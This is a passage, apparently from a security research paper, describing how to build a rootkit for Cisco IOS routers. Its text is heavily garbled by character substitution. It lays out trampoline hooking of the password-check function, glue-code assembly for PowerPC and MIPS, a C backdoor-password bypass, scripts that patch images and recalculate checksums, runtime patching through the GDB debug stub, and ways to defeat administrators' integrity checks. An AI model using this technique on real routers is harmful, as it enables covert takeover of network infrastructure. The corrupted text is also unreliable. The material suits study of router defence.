a##e#* el)*%rite/ile6iosH)ilena!e @ '*ne%'7 +!age !anipulation !ust be #one ery care)ully because it %ill be relocate# a)ter the #eco!pression process an# any inali# !e!ory re)erence coul# lea# to an e'ception resulting in a syste! crash* +n the prece#ing paragraphs" a nu!ber o) !etho#s to insert the rootkit co#e hae been !entione#" but they all hae so!ething in co!!on ,, the rootkit co#e !ust be a##ressable )ro! current +OS )unctions so the !e!ory a##ress selecte# to store the co#e is nee#e#* "ootkit address book: $unctions to %call% in it Since the !etho# selecte# to place our rootkit insi#e the +OS i!age is to oer%rite e'isting strings" the )irst step is to rea# the rootkit that %as preiously co!pile# to e'tract the necessary co#e 6this is achiee# using a script !entione# bello%7 )or the current architecture %hether it's M+0S or 0o%er0C" an# %rite it at the selecte# string location* Once this is #one" the !e!ory a##ress that points to the en# o) the rootkit co#e !ust be store# )or )urther operations on the i!age* 8e't" eery )unction o))set insi#e the preco!pile# rootkit C co#e !ust be kno%n" so %hen an +OS )unction is patche# to call to its rootkit counterpart" the a##ress o) the rootkit )unction !ust be inserte# insi#e the shellco#e that %ill pro#uce the =u!p* /or e'a!ple" %hen re#irecting e'ecution )lo% )ro! +OS i!age chkHpass67 )unction call to the rootkit counterpart )unction" the o))set o) the rootkit )unction insi#e the entire co!pile# rootkit co#e is nee#e# to =u!p to its location relatie to the original +OS )unction an# then return* +) the e'act location o) the rootkit )unction is not kno%n" then !ost likely an e'ception %ill eentually be generate#* - !ore in,#epth e'planation %ill be gien later about this issue an# %hy it's so i!portant* /or no%" let =ust )ocus on obtaining the Page 20 of 37 rootkit co#e an# its )unction:s o))sets an# sy!bols* To #u!p the co#e #isasse!bly to a )ile on #isk" XCC %ill be use# to co!pile the rootkit co#e an# then taking a#antage o) E&/ !anipulation tools inclu#e# in the binutils package1203* - te't output %ill be generate# using ob=#u!p utility1223 to #isasse!bly the co#e an# obtain a !ap o) it's sy!bol locations* 8e't is a sa!ple output )ro! this tool? 4isasse!bly o) section *te't? 02800BD0 MchkHpass,0'BY? 2800BD0? B2 B) BE O) bcla, 28"BKcr>@so"BEOc J UPO/HU 02800BDB MchkHpassY? 2800BDB? DB 22 )) #0 st%u r2",B86r27 2800BD8? Qc 08 02 aE !)lr r0 2800BDc? D> e2 00 28 st% r>2"B06r27 2800Ba0? D0 02 00 >B st% r0"O26r27 **** 2800O08? Qc 08 0> aE !tlr r0 2800O0c? 8> eb )) )8 l%z r>2",86r227 2800O20? Q# E2 Ob Q8 !r r2"r22 2800O2B? Be 80 00 20 blr 02800O28 MchkHpassH!#OY? 2800O28? DB 22 )) e0 st%u r2",>26r27 2800O2c? Qc 08 02 aE !)lr r0 2800O20? D> e2 00 28 st% r>2"2B6r27 2800O2B? D0 02 00 2B st% r0">E6r27 **** 2800E20? Qc 08 0> aE !tlr r0 2800E2B? 8> eb )) )8 l%z r>2",86r227 2800E28? Q# E2 Ob Q8 !r r2"r22 2800E2c? Be 80 00 20 blr 2800E>0? BO B) BE O) *long 0'BOB)BEO) J *ascii UEO/HU 02800E>B MHstartY? 2800E>B? DB 22 )) e0 st%u r2",>26r27 2800E>8? D> e2 00 28 st% r>2"2B6r27 *** Those sy!bols containing the )unction na!es an# a##resses %ill be parse# by a 0ython progra! specially create# to return the appropriate in)or!ation* +n the a##resses 0'2800BD0 an# 0'2800E>0" Page 21 of 37 t%o -SC++ strings can be obsere#* Those t%o strings are !arker )lags set in the plain C rootkit co#e an# use# by the scripts to e'tract the co#e in bet%een ,, %hich is the rootkit co!pile# co#e )or the target architecture 6%hether it's M+0S or 0o%er0C7 an# o) interest to us* This %ay the unnecessary co#e is le)t behin# an# only a s!all a!ount o) co#e is kept to be inserte# into the +OS i!age* The resulting )ile containing #isasse!bly co#e" sy!bols an# opco#es )or eery instruction %ill be processe# by a 0ython script giing a 0ython tuple ob=ect o) the t%o ele!ents as a result* The )irst ele!ent 6ariable co#eHin#e'es7 is a 0ython #ictionary ob=ect in#e'e# by )unction na!e an# containing the )unction:s starting o))set as the secon# ele!ent o) the tuple* The secon# ele!ent 6ariable co#eHinstructions7 contains a 0ython list ob=ect %ith eery instruction an# the correspon#ing opco#e alues to %rite into the selecte# string o) the +OS i!age* The relation bet%een the! is the )ollo%ing? co#eHin#e'es13 co#eHinstructions67 @,,,,,,,,,,,,,,,,,,@,,,,,,,@ @,,,,,,,,,,,@,,,,,,,,,,,,,,,,,,@ A /unction 8a!e AO))set A A Opco#e A +nstruction A @,,,,,,,,,,,,,,,,,,@,,,,,,,@ @,,,,,,,,,,,@,,,,,,,,,,,,,,,,,,@ A chkHpass A 0 AM,,,,,,YA0'DB22))#0 A st%u r2",B86r27 A A A A A A A A chkHpassH!#O A >0 AM,,,,@ A ***6>0 ite!s bet%een7*** A A A A A A A A A openH)ile A 8O AM,@ @,YA0'DB22))#O A st%u r2",B>6r27 A A A A A A A A @,,,,,,,,,,,,,,,,,,@,,,,,,,@ A A ***6OO ite!s bet%een7*** A A A A A @,,,,YA0'Qc0>0>Q8 A !r r>"r0 A A A A A ***6!ore ite!s7*** A @,,,,,,,,,,,@,,,,,,,,,,,,,,,,,,@ -s you can see" the #ictionary ob=ect calle# co#eHin#e'es uses the )unction:s na!e as its key an# the correspon#ing alue is the o))set to the secon# ob=ect calle# co#eHinstruction that contains the parse# output %ith instructions an# its opco#es* This %orks either on 0o%er0C an# M+0S plat)or!s because it uses the output o) the 0ython script" %hich is al!ost the sa!e )or both architectures 6the script takes care o) s!all #i))erences on the output7* Page 22 of 37 Code &oyeurism and fetishism Once the key )unctions are )oun#" rootkit insertion %ill be #iscusse# using a binary patching techni.ue on the +OS i!age* Once in control o) the )unction" it %ill take #i))erent actions base# on the para!eters passe# at run,ti!e* &et's take )or e'a!ple the pass%or#,checking )unction* +n this case the rootkit !ust take control at the beginning o) the )unction 6kno%n as prologue7 to check i) the rootkit pass%or# %as entere#* +n that case the original pass%or# check )unction %on't be e'ecute#" other%ise it %ill be as i) nothing ha# happene#* That !eans that so!e instructions 6architecture #epen#ent7 %ill be oer%ritten at the prologue o) the )unction an# store# )or )urther usage* 8e't is a co!!on )unction prologue )ro! an +OS running on 0o%er0C? *te't?80>PEB>B st%u Wsp" ,0'286Wsp7 J create stack *te't?80>PEB>8 !)lr Wr0 J !oe ret a##r to Wr0 *te't?80>PEB>C st!% Wr>0" 0'206Wsp7 J sae preious alues *te't?80>PEBB0 st% Wr0" 0'2C6Wsp7 J store ret a##r on stack *te't?80>PEBBB !r Wr>2" Wr> J !oe para!s to use *te't?80>PEBB8 !r Wr>0" WrB J *** *te't?80>PEBBC li Wr0" 0 *te't?80>PEBO0 st% Wr0" 0'28@arH206Wsp7 4ue to the nature o) the R+SC architecture 6#espite the #i))erences bet%een M+0S an# 0o%er0C7 the return a##resses !ust be store# by the )unction prologue because 6as a #i))erence to '8E7 it:s store# in a register calle# &R 6&ink Register7 instea# o) in the stack* Saing the return a##ress an# registers %hose alues !ust preail intact a)ter the )unction returns is one o) the tasks o) the prologue* +n or#er to take control o) the e'ecution )lo%" the )irst instruction o) the original )unction o) +OS targete# )or re#irection 6in the case o) 0o%er0C" the )irst t%o instructions )or +OS running on M+0S7 !ust be oer%ritten %ith a =u!p to a location %ith speci)ic shellco#e %hich %as preiously selecte# by replacing a #ebug string use# insi#e the +OS* The instruction that oer%rites the )unction prologue is calle# trampoline an# %ill re#irect the e'ecution )lo% to a location kno%n as glue code* Page 23 of 37 The trampoline is responsible )or =u!ping i!!e#iately 6an# uncon#itionally7 to attacker,speci)ic co#e that %ill !ake so!e stack arrange!ents base# on a preiously kno%n nu!ber o) para!eters to be passe# to the rootkit )unction an# ulti!ately call the appropriate )unction in the rootkit co#e* The glue code is responsible )or the )ollo%ing? 2* Saing the return a##ress* 4ue to the )act that the co#e )ro! the tra!poline '=u!pe#' to the glue co#e" this is the a##ress o) the instruction )ollo%ing the one that calle# the original +OS )unction* 2* Storing the )unction para!eters currently allocate# in processor registers into the stack* >* -llocating space on the stack )or an e'tra )unction para!eter nee#e# by the rootkit C co#e* B* Calling the rootkit plain C co#e* O* 0rocessing the return alue o) the rootkit C co#e to #eci#e %hether to continue the e'ecution o) the original +OS )unction or return #irectly to the caller* E* +) the e'ecution o) the original )unction !ust continue" then the original )unction call para!eters store# in the stack are restore#" the oer%ritten instructions )ro! the original +OS )unction are e'ecute#" an# )inally a =u!p to the instruction ne't to the trampoline is per)or!e#* Q* +) the e'ecution o) the original )unction !ust not be per)or!e#" the alue at the !e!ory allocate# )or the e'tra para!eter is copie# into the register that contains the return alue o) the original )unction )ollo%e# by a =u!p to the return a##ress store# in step nu!ber one* This high leel e'planation is inten#e# to brie)ly e'plain the )unctionality o) the glue co#e an# to e'press that it is a ital part o) the bri#ge that co!!unicates the original +OS )unctions 6no% suberte#7 %ith the counterpart rootkit )unctions %ritten in plain C* The beginning o) the )unction" %hich %as preiously #etecte# using strings re)erences 6)ro! neighbors or itsel)7 is locate# using +4-" ha# its prologue oer%ritten %ith the tra!poline co#e* Page 24 of 37 This is a co!!on techni.ue kno%n as hooking an# consists o) intercepting a )unction call by re#irecting the co#e e'ecution to the rootkit co#e )or )urther processing an# then returning to the original point* Pelo% is a high,leel graphic e'plaining the e'ecution path until it reaches the rootkit co#e an# ho% the in)or!ation is processe#? +OS caller chkHpass 6p7 Xlue co#e chkHpassH4+56p"i7 @,,,,,,,,,,,,,,,,,@ @,,,,,,,,,,,,,,,,,@ @,,,,,,,,,,,,,,,,,,,,,,@ @,,,,,,,,,,,,,,,,,@ A A A A A A A A A r C chkHpass6p7 A,2,YA tra!poline A,,2,YA a## stack A >,,YA i) p CC 'l>>Q'? A A A A A A store parent R- A A A i C true A A i) r CC true? AM, A rest o) co#e AM,@ A store para!s p A A @,A return RET A A login67 A A A *** A A A create para! i A A A A else? A A else? A @,,A return legalHresA O A o C chkHpassH4+56p"i7A,@ A,A return CO8T A A #enyHlogin67 A A A A A A )i' stack AM,,B A A A *** A A A A A A i) o CC CO8T? A A A @,,,,,,,,,,,,,,,,,@ A @,,,,,,,,,,,,,,,,,@ A A e'ec orig instruct A @,,,,,,,,,,,,,,,,,@ A @,,A return para!s p A A A cont chkHpassH+OS A A A else? A @,,,,,,,M,,,,E,,,M,,,,,,,,,A r C i A A =u!p to R- A A A @,,,,,,,,,,,,,,,,,,,,,,@ +n the )ollo%ing e'a!ple" the +OS )unction responsible )or pass%or# checking is hooke# an# base# on the result 6%hether the pass%or# is a back#oor pass%or# or not7" the e'ecution )lo% is re#irecte# again to either inoke the original )unction co#e or to return #irectly to the caller 6bypassing authentication7 as e'plaine# belo%? 2* - )unction insi#e the +OS calls the pass%or# ali#ation )unction call chkHpass67* -t the beginning o) this )unction" using the hooking techni.ue to apply the tra!poline's co#e" the rootkit seizes control o) the e'ecution )lo%* +n the case o) the 0o%er0C %e si!ply %rite a branch instruction 6b7 like the )ollo%ing? *te't?80>PQDPB B8 4C C> DC b locH8228>4O0 The ne't e'a!ple coers the case o) the M+0S architecture %here a =u!p instruction 6=7 %ill be %ritten at the )unction prologue" )ollo%e# by a 8O0 instruction to aoi# proble!s %ith #elay,slots on this architecture? Page 25 of 37 &O-4?E0BE0-0B 08 O- OB PP = locHE2EDO2EC &O-4?E0BE0-08 00 00 00 00 nop This is the !otie %hy in +OS" %ith i!ages )or M+0S architecture" t%o instructions on the prologue are oer%ritten* 2* The glue co#e is inoke# so that the steps preiously e'plaine# take place* 8o% a #etaile# e'planation o) the shellco#e use# %ill be sho%n )or calling a )unction that e'pects )our para!eters" three o) %hich are the original )unction's para!eters" an# the )ourth para!eter is the return alue 6this alue is ignore# by the shellco#e i) the )unction #oesn't return any alue" like in the case o) oi# )unctions7* /ollo%ing is a co!plete #isasse!bly o) the glue co#e )or the 0o%er0C architecture? *#ata?8228>4O0 locH8228>4O0? *#ata?8228>4O0 !)lr Wr0 J Sae return a##ress *#ata?8228>4OB st% Wr0" ,B6Wsp7 J Copy ret a##r into stack *#ata?8228>4O8 st% Wr>" ,0'C6Wsp7 J Store para! 2 *#ata?8228>4OC st% WrB" ,0'206Wsp7 J Store para! 2 *#ata?8228>4E0 st% WrO" ,0'2B6Wsp7 J Store para! > *#ata?8228>4EB a##i WrE" Wsp" ,8 J Xet a##ress o) para! B *#ata?8228>4E8 st%u Wsp" ,0'2C6Wsp7 J Sae stack space )or para!s *#ata?8228>4EC bl subH8228>PPB J +noke 4+5 plain C co#e *#ata?8228>4Q0 a##i Wsp" Wsp" 0'2C J Restore allocate# stack *#ata?8228>4QB c!p%i Wr>" 0 J Check i) RET(R8 to caller *#ata?8228>4Q8 l%z Wr>" ,B6Wsp7 J Obtain ret a##ress store# *#ata?8228>4QC !tlr Wr> J Copy ret a##r to register *#ata?8228>480 be. locH8228>4D8HRETJ E'ec RET(R8 or CO8T co#e] *#ata?8228>48B l%z Wr>" ,0'C6Wsp7 J Restore original para! 2 *#ata?8228>488 l%z WrB" ,0'206Wsp7 J Restore original para! 2 *#ata?8228>48C l%z WrO" ,0'2B6Wsp7 J Restore original para! > *#ata?8228>4D0 st%u Wsp" ,0'286Wsp7 J E'ecute oer%ritten inst *#ata?8228>4DB b locH80>PQDP8 J Continue a)ter tra!poline ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, *#ata?8228>4D8 *#ata?8228>4D8 locH8228>4D8HRET? R CO4E 9RE/? *#ata?8228>480R= *#ata?8228>4D8 l%z Wr>" ,86Wsp7 J Set )unction return alue *#ata?8228>4DC blr J Return to +OS caller The co!!ents ne't to eery instruction in the aboe #isasse!bly represent the step preiously #escribe# %hen the glue co#e %as )irst intro#uce#* Page 26 of 37 +t's i!portant to re!in# rea#ers at this point that the part o) this shellco#e that storesIrestores the original )unction para!eters %as #yna!ically calculate# by the +4-,0ython script* +t's also %orth !entioning that the co!pile# rootkit co#e" %hich %as place# in !e!ory that originally belonge# to a #ebug string" %as success)ully e'ecute# allo%ing the attacker to achiee one o) the !ost i!portant parts o) this rootkit ,, %hich is to !aintain a uni.ue co#e base %ritten in plain C that %orks )or both plat)or!s %ithout haing to take care o) architecture, speci)ic #etails* The M+0S co#e per)or!s the sa!e task as the 0o%er0C co#e but %ith the correspon#ing M+0S instructions? 4-T-?E2EDO2EC locHE2EDO2EC? 4-T-?E2EDO2EC s% [ra" ,B6[sp7 J Copy ret a##r into stack 4-T-?E2EDO2/0 s% [a0" ,0'C6[sp7 J Store para! 2 4-T-?E2EDO2/B s% [a2" ,0'206[sp7 J Store para! 2 4-T-?E2EDO2/8 s% [a2" ,0'2B6[sp7 J Store para! > 4-T-?E2EDO2/C a##i [a>" [sp" 0'///8 J Xet a##ress o) para! B 4-T-?E2EDO>00 a##iu [sp" ,0'2C J Sae stack space )or para!s 4-T-?E2EDO>0B =al subHE2EDO2EB J +noke 4+5 plain C co#e 4-T-?E2EDO>08 nop J nop )or #elay,slot 4-T-?E2EDO>0C a##iu [sp" 0'2C J Restore allocate# stack 4-T-?E2EDO>20 l% [ra" ,B6[sp7 J Obtain ret a##ress store# 4-T-?E2EDO>2B be.z [0" locHE2EDO>>8J E'ec RET(R8 or CO8T co#e] 4-T-?E2EDO>28 nop J nop )or #elay,slot 4-T-?E2EDO>2C l% [a0" ,0'C6[sp7 J Restore original para! 2 4-T-?E2EDO>20 l% [a2" ,0'206[sp7 J Restore original para! 2 4-T-?E2EDO>2B l% [a2" ,0'2B6[sp7 J Restore original para! > 4-T-?E2EDO>28 a##iu [sp" ,0'28 J E'ecute 2 st oer%ritten inst 4-T-?E2EDO>2C s% [s0" 0'286[sp7 J E'ecute 2 n# oer%ritten inst 4-T-?E2EDO>>0 = locHE0BE0-0C J Continue a)ter tra!poline 4-T-?E2EDO>>B nop J nop )or #elay,slot ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 4-T-?E2EDO>>8 4-T-?E2EDO>>8 locHE2EDO>>8? R CO4E 9RE/? 4-T-?E2EDO>2BR= 4-T-?E2EDO>>8 l% [0" ,86[sp7 J Set )unction return alue 4-T-?E2EDO>>C =r [ra J Return to +OS caller 4-T-?E2EDO>B0 nop J nop )or #elay,slot +t's also i!portant to note that the a##ress %here the glue co#e starts is at the en# o) the rootkit co#e" so all the co#e is put together in the sa!e !e!ory area 6an# hope)ully the sa!e !e!ory page7* Page 27 of 37 +n the scenario #escribe# aboe it is possible to #escribe the tasks per)or!e# by the glue co#e by saying that it stores the return a##ress o) the original )unction call" calls the rootkit )unction %ith the sa!e argu!ents o) the +OS legiti!ate )unction" an# processes the result o) the )unction call* This result is nee#e# to #eter!ine i) e'ecution )lo% %ill return to the instruction )ollo%ing the trampoline an# continue the original path by e'ecuting the instructions that %ere oer%ritten %ith the tra!poline 6in case that the pass%or# entere# is not the rootkit pass%or#7" or return #irectly to the tra!poline's caller because no !ore pass%or# ali#ation is nee#e# 6in case the pass%or# entere# is the rootkit:s !aster pass%or#7" %hich !eans that the attacker is logging in* The glue code is crucial )or rootkit operations because so!e o) those pain)ul steps !ight not be necessary i) the rootkit co#e %as i!ple!ente# in pure asse!bly* +n the case o) 4+5 it %as i!ple!ente# in plain C to allo% easy !aintenance* 8o% it's clear %hy those )e% lines o) special asse!bly instructions calle# trampoline an# glue code %ere nee#e# to )ill the gap bet%een a C )unction co!pile# 6%ith Position Independent Code7 )or the target architecture an# e'tracte# to be inserte# 'as is' #irectly insi#e the +OS i!age* The a#antage o) this !etho# is that only one C co#e is !aintaine# 6%ith certain li!itations" o) course7 instea# o) t%o asse!bly co#es that per)or! the sa!e actions on #i))erent architectures 6a M+0S co#e an# a 0o%er0C co#e7* 'earning the a( b( (lain) C The rootkit co#e %ill change accor#ing to the nee#s o) the attacker" %hich !ay inclu#e hi#ing )iles" hi#ing connections" !aintaining back#oors" cleaning logs" etc* ,, all o) the! proi#ing a co!plete stealth operation #uring an attacker's isit* Those )eatures %ill take )or! o) C )unctions an# once those )unctions: co#e is co!pile#" their bytes %ill be nee#e# so they can be inserte# into the +OS i!age* Put a proble! arises because the co!pile# co#e is an E&/ )ile )or the target architecture an# this is %here the )lags 6PO/Han# EO/H7 ,, !entione# in the 'rootkit a##ress book' section 6the #u!p sa!ple inclu#e# those )lags7 ,, %ill be use# to separate the bytes o) interest )or the attacker )ro! the rest o) Page 28 of 37 the E&/ )ile* Those )lags are =ust inline asse!bly !arkers like the )ollo%ing? R#e)ine PO/H4+5HCO4E as!6U*ascii VUPO/HVUU7 R#e)ine EO/H4+5HCO4E as!6U*ascii VUEO/HVUU7 Those t%o !arkers %ere place# at the beginning an# at the en# o) a source co#e )ile 6al%ays outsi#e o) e'isting )unctions7 so the co!piler si!ply inclu#es the! an# then a 0ython script can take a#antage o) this to #eli!it the necessary co#e )or the rootkit* The rootkit also re.uire# that the strings %ere in the sa!e section o) the co#e instea# o) #i))erent sections like they usually are 6*TE9T7 so a %ay to inclu#e the! ne't to the )unctions an# a %ay to obtain their a##resses 6an# that those a##resses support 0+C ^ 0osition +n#epen#ent Co#e7 %as absolutely necessary* Other%ise the rootkit %oul#n't hae strings support an# that's not acceptable* To a##ress this issue" inline asse!bly %as e!ploye# to put the ra% strings besi#e a )unction an# then obtain the pointer to those strings through this )unction using a shellco#e that resoles the current )unction a##ress 6to allo% 0+C7 an# then a##s an o))set %hich is architecture speci)ic* The i#ea %as to create a )unction that containe# the string an# also the shellco#e to return its !e!ory a##ress 6like a charK7 so the )ollo%ing steps %ere nee#e#? oi# psz0ass%or#6oi#7 II String pointer na!e L 2* Co#e that obtains current 0C* 2* Store 0C into a ariable* >* -## an o))set 6to point to inline as! instruction7 to point to )unction's en#* B* Return the ariable pointing to en# o) )unction6string begins there7* N as!6U*ascii VU!y back#oor pass%or#VU7J II Our string as!6U*byte 0U7J II 8ull ter!inator $ith this sche!a" a !acro %as create# to re)erence the )unction a##ress plus an o))set 6%hich is architecture speci)ic7 to aoi# the )unction's co#e until the en# o) the )irst byte a)ter the epilogue* Page 29 of 37 The epilogue length aries bet%een architectures so %e #eter!ine the current %orking architecture using XCC internal #e)initions to obtain the correct o))set alue* The )ully )unctional !acros )or both 0o%er0C an# M+0S are sho%n belo% in a !acro calle# STR+8XH4E/+8E* Ri)#e) HH!ipsHH R#e)ine HO//SET 0'>0 Reli) HH00CHH R#e)ine HO//SET 0'>B Ren#i) Reli) HH!ipsHH R#e)ine STR+8XH4E/+8E6na!e"content7 charK na!e6oi#7 V L V int ret C 0J V int origHblrJ V as!6U!oe W0" [raU V ?UCrU6origHblr77J V as!6UnopU7J V as!6Ubal @BJU7J V as!6U!oe W0" [raU V ?UCrU6ret77J V as!6U!oe [ra" W0U V ??UrU6origHblr77J V return6charK7ret@HO//SETJV N V as!6U*ascii VUUcontentUVUU7JV as!6U*byte 0U7J Reli) HH00CHH R#e)ine STR+8XH4E/+8E6na!e"content7 charK na!e6oi#7 V L V int retJ V int origHblrJ V as!6U!)lr Wr8JU7J V as!6U!r W0" WWr8U V ?UCrU6origHblr77J V as!6Ubl @BJU7J V as!6U!)lr Wr8JU7J V as!6U!r W0" WWr8U V ?UCrU6ret77J V as!6U!r WWr8" W0U V ??UrU6origHblr77J V as!6U!tlr Wr8JU7J V return 6charK7ret@HO//SETJV Page 30 of 37 N V as!6U*ascii VUUcontentUVUU7JV as!6U*byte 0U7J Ren#i) This !acro takes t%o para!eters" the )irst is the pointer na!e 6)unction na!e7 an# the secon# is the content 6the string itsel)7* So" to use it re)er to that string 6get a pointer to it7 like any other string* - s!all #etail is that Unake#U attribute is not aailable )or those target architectures an# that is %hy the o))set stu)) to aoi# the prologue is nee#e#* Other%ise the )unction prologue an# epilogue %oul#n't be inclu#e# by the co!piler* Pelo% is an e'a!ple o) usage o) the string !acro? STR+8XH4E/+8E6psz0ass%or#" U#ikHrulezU7 oi# !yRootkit/unction6int so!earg7 L charK psz0ass C psz0ass%or#67J II /unction na!e as string pointer II or print)6U0ass%or# C WsU" psz0ass%or#677J II co!!on pointer usage N $ith the string issue sole#" the rest o) the rootkit co#e is si!ply a plain C progra! like any other an# the only thing to keep in !in# is that the rootkit's )unctions !ust )ollo% a )e% rules* These rules are that rootkit )unctions !ust return an integer to in#icate to the glue co#e" %hether to continue e'ecution o) the original +OS )unction" or return to the caller ,, an# also !ust inclu#e one para!eter !ore than the original +OS )unction %hich %ill contain the return alue o) the original +OS )unction in case returning to the caller is nee#e#* uint chkHpassH4+56char Kinput"char Kcorrect"uint al"uintK hookHres7 L II !yHstrc!p is also a rootkit )unction i) 6!yHstrc!p6input" psz0ass%or#677 CC 07 L KhookHresult C 2J II !aster pass%or# speci)ie# return O0HRET(R8J N Page 31 of 37 return O0HCO8T+8(EJ N +n the aboe e'a!ple" the usage o) a )unction to return a string pointer is sho%n" as %ell as inoking another rootkit )unction 6in this case is !yHstrc!p )unction7* +t is clear at this point that the rootkit )unctionality is only li!ite# by the attacker's creatiity because it's like progra!!ing anything else in C* $unctioning without the others functions - )unction that per)or!s pass%or# checking is use)ul to retriee other users: pass%or#s in plain te't an# i) this in)or!ation coul# be %ritten so!e%here 6!ay be a hi##en )ile on )lash )ile syste!7 or trans!itte# oer a TC0 connection using +OS socket han#ling capabilities" %oul# be o) great interest )or an attacker* There are seeral )unctions besi#es the one !entione# aboe that a rootkit !ust hookIpatch to take co!plete control o) the syste!* Those )unctions inclu#e e.uialents o) )ile,han#ling )unctions like rea#I%rite" socket han#ling like sen#Irec" an# +OS )unctions that i!ple!ent the C&+ 6Co!!an# &ine +nter)ace7 co!!an#s that can alert the syste! a#!inistrator o) unauthorize# access* 0ointers to those )unctions nee# to be use# )ro! the C rootkit co#e to be able to e!ploy the! into the rootkit co#e* This coul# be #one by creating stub )unctions in the C co#e that contain a =u!p to the )unction's location insi#e" but this location %ill only be resole# a)ter analyzing the +OS i!age %ith +4-* To sole this proble!" the stubs )unction coul# be create# in the co#e containing a call to an in#e' insi#e a =u!p table %hich coul# be )ille# by a 0ython script %ith the a##ress o) the real )unction in !e!ory* Mo#ern co!pilers use this approach to #yna!ically resole the a##resses o) library )unctions re)erence# by a user progra!" %hich at co!pile ti!e are unkno%n to the co!pilerIlinker an# beco!e kno%n %hen the progra! is e'ecute# an# the =u!p table is )ille# %ith the Page 32 of 37 resole# 6current7 !e!ory a##resses* Peing able to use +OS internal )unctions gies the rootkit a !ore a#ance# leel o) stealth" an# allo%s )or capabilities that go )ar beyon# si!ple )unction hooking* /or e'a!ple" nor!al security proce#ures like #o%nloa#ing the +OS i!age in a perio#ic !anner by the syste! a#!inistrator to per)or! a checksu! 6like M4O" S<-2" etc*7 as part o) the co!pany security process to #etect !o#i)ie# i!ages coul# be easily re#irecte# to an e'ternal serer that contains an unaltere# i!age %ithout any suspicion* +t coul# een intercept the rea# )unction calls asking )or a chunk o) the co!presse# i!age on )lash 6or any other !e#ia7 an# in that !o!ent it #eco!presses the in)ecte# chunk" patches it %ith the original bytes 6%hich %ere preiously store# on a )ile in the )lash )ile syste! ,, assu!ing that those )unctions a##resses are kno%n by preious analysis7 an# re,co!press it so it's returne# intact 6this is possible since the co!pression algorith! can %ork %ith chunks o) bytes instea# o) the entire )ile7* -t this !o!ent" the #i))erence bet%een a lo% leel rootkit an# a si!ple TC& script can be appreciate# because such actions like the one !entione# aboe coul# neer be achiee# by a higher leel rootkit* One i!portant )eature o) the rootkit is that the hooking !etho# #oesn't nee# any a##itional process running to per)or! those actions" so listing processes is not going to help )or #etection because all that 4+5 #oes is intercept )unction calls an# re#irect e'ecution )lo% to per)or! certain tasks an# then continue at the a##ress a)ter the re#irection takes place* "eady( steady( go $ith the rootkit co#e in place" it's ti!e to #u!p the ne%ly,patche# +OS i!age" repack it %ith the original 6sel) #eco!pressing7 )ile hea#er an# uploa# it to the target syste!* Rea#ing the patche# +4- i!age an# %riting its content to a )ile can be #one easily" as in the )ollo%ing e'a!ple? Page 33 of 37 R Create a ne% )ile to %rite the change# bytes )#Ht!p C open6'rootkitHcontent*t!p'" '%b'7 co#eH#u!p C '' R +terate through eery byte change# in the original +OS i!age R R rootkitHa##ress contains initial rootkit a##ress %here preiously R a #ebug string %as locate#* R R currentHen#E- contains the last !o#i)ie# i!age a##ress R )or ea in range6rootkitHa##ress" currentHen#E-" B7? co#eH#u!p @C pack6'Y&'" getHlong6ea77 )#Ht!p*%rite6co#eH#u!p7 )#Ht!p*close67 This generate# )ile %ill later be !erge# %ith the original +OS )ilena!e to create the #eco!presse# back#oore# +OS i!age* 8o% #etails %ill be gien about ho% to !erge the rea#y rootkit co#e in the te!poral )ile %ith the original +OS i!age ,, because this is a triial byte replace!ent operation an# the o))sets to apply the patch on the original i!age can be obtaine# )ro! +4-* The checksu! o) the patche# +OS i!age !ust be calculate# again because no% that its content hae change# the ol# checksu! alues %on't !atch* - script in 0ython that i!ple!ents the checksu! algorith! #escribe# at the beginning can be use# to recalculate the checksu! an# recreate the sel) #eco!pressing +OS i!age using the original i!age hea#er 6)ro! the )irst byte to the en# o) the S/9 section7 an# obtain an i!age rea#y to be uploa#e# to the #eice using a nor!al i!age upgra#e proce#ure* Other ways of !he $orce +!age binary patching has been #iscusse# in #epth but a run,ti!e !e!ory patching techni.ue is also possible using the X4P1223 stub inclu#e# insi#e eery +OS i!age* The X4P stub is the #ebugging inter)ace )or Cisco #eelopers %hich allo%s the! to #ebug +OS processes* +t also allo%s re!ote i!age #iagnostics because it's capable o) %orking oer a Telnet session as Page 34 of 37 %ell as oer a Serial session establish on the console port* This X4P stub is capable o) %orking in three #i))erent %ays? 0rocess e'a!ination? -llo%s !e!ory inspection an# processor registers inspection but it cannot !o#i)y syste! alues 6!e!ory o) registers alues7* The syste! e'ecution continues nor!ally #uring #ebugging so 'e'a!ine' !o#e can be e'ecute# oer a Telnet session* 0rocess #ebugging? +n the situations that a console port o) the #eice is not accessible" process #ebug !o#e can be e'ecute#* +t %orks by catching unhan#le# e'ceptions on the speci)ie# process" setting it in a special state %here it %ill not be resche#ule# an# then running the process o) the #ebugger to #ebug the )aile# process* The +OS syste! continues to run #uring process #ebugging so it is possible to #ebug a process oer a Telnet session but certain restrictions apply* The sche#uler" an interrupt serice routine or any process nee#e# )or the #ebugging path 6such as TC0I+07 cannot be #ebugge# oer this session* This #ebugging !o#e is capable o) !e!ory an# processor registers !o#i)ication so this is the best option )or an attacker to re!otely !o#i)y the #eice !e!ory to insert the back#oor* 5ernel #ebugging? +) the attacker gains physical access to a console port he or she can e'ecute the kernel #ebugger %hich is the pre)erre# %ay to #ebug a router* +n this !o#e" the entire #eice e'ecution is stoppe# #uring the e'ception" )reezing all syste! states* (sing the Telnet connection" a re!ote X4P instance can be e'ecute# to per)or! !e!ory patching but certain precautions !ust be taken" such as not %riting the tra!poline co#e be)ore the rootkit co#e" because" i) a patche# )unction is inoke# be)ore the rootkit co#e is in place a !e!ory access iolation %ill be raise# lea#ing to a syste! crash* -n attacker !ight %ant to auto!ate this run,ti!e patching proce#ure )or eery syste! restart an# it can be acco!plishe# in a )e% #i))erent %ays* One possible %ay is to create a TC& script to e'ecute at startup" engage a Telnet session %ith the local host an# e'ecute the process #ebugger to patch the #eice it is running on* +n this case" the script !ust contain the rootkit co#e insi#e %ith the !e!ory locations to be !o#i)ie# ,, %hich coul# hae been preiously obtaine# by the sa!e analysis phase inole# in the i!age binary patching proce#ure* Page 35 of 37 Conclusions - reliable an# generic !etho# )or Cisco +OS i!age in)ection can be i!ple!ente# either ia binary i!age !o#i)ication or ia run,ti!e co#e patching* To )ace this kin# o) threat the only possibility aailable to#ay is to use C+R12>3" a tool create# by /eli' '/9' &in#ner )ro! Recurity &abs an# presente# early this year %hen he talke# about #eelop!ents on +OS 